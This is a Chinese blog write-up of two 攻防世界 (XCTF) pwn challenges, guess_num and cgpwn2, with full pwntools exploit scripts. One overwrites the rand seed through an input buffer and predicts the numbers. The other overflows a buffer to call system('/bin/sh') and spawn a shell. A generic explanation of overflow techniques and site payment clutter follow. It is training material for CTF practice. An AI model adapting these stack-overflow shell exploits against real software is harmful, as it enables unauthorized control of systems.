攻防世界——pwn(3)

guess_num

在这里插入图片描述
在这里插入图片描述
seed和rand的知识点就是一个伪生成随机数的东西要用ctypes倒入这个库才能用rand

理一下思路,利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了
exp

from pwn import * 
from ctypes import * #倒入了可以去找libc库
context.log_level = 'debug' 
p = remote("111.198.29.45",30571) 
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")在这个库里可以找到rand
pay = "A"*0x20 + p64(1) 从v7把seed[0]覆盖成1
p.sendlineafter("name:",pay)
libc.srand(1)
for i in range(10): 
  p.sendlineafter("number:",str(libc.rand()%6 + 1))
print p.recv() 

在这里插入图片描述

cgpwn

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

思路,name在bss段,把/bin/sh写进去,gets栈溢出执行system

from pwn import*

a=process("./cgpwn2")

bin_sh_addr=0x0804A080

a.recvuntil("please tell me your name\n")

a.sendline("/bin/sh\x00")

a.recvuntil("hello,you can leave some message here:\n")

system_addr=0x08048420

payload='A'*42+p32(system_addr)+p32(0x1234)+p32(bin_sh_addr)#注意返回地址一定要写

a.send(payload)

a.interactive()

``![`](https://img-blog.csdnimg.cn/20190411003039338.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDMxOTE0Mg==,size_16,color_FFFFFF,t_70)



  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
你好!很高兴回答你的问题。关于软件安全实验二中的攻击方式Pwn,我可以为你提供一些基本的信息。Pwn是指通过利用软件漏洞来获取对计算机系统的控制权。在实验二中,你可能会学习和尝试使用缓冲区溢出漏洞、格式化字符串漏洞、堆溢出等技术来进行Pwn攻击。 缓冲区溢出是一种常见的Pwn攻击技术,它利用了程序在处理输入数据时没有正确限制长度的漏洞。通过向程序输入过长的数据,可以覆盖到程序运行时的内存空间中的其他重要数据,例如返回地址。通过修改返回地址,攻击者可以控制程序流程,执行恶意代码。 格式化字符串漏洞是另一种常见的Pwn攻击技术。它利用了C语言的格式化字符串函数(如printf、sprintf等)在处理格式化字符串时存在的安全问题。通过向程序输入特定格式的字符串,攻击者可以读取或修改内存中的数据,甚至执行任意代码。 堆溢出是利用堆内存管理中的漏洞进行攻击的一种技术。在使用动态分配内存时,如果没有正确地释放或管理内存,可能会导致堆溢出。通过在堆中溢出写入数据,攻击者可以修改关键数据结构,从而影响程序的执行逻辑。 以上只是Pwn攻击的一些基本概念,实际的Pwn攻击还涉及很多技术和细节。在进行任何Pwn攻击之前,请务必遵循法律和道德规范,并确保你在合法授权的环境中进行实验。 如果你有任何关于Pwn攻击或软件安全实验的具体问题,我会尽力为你解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值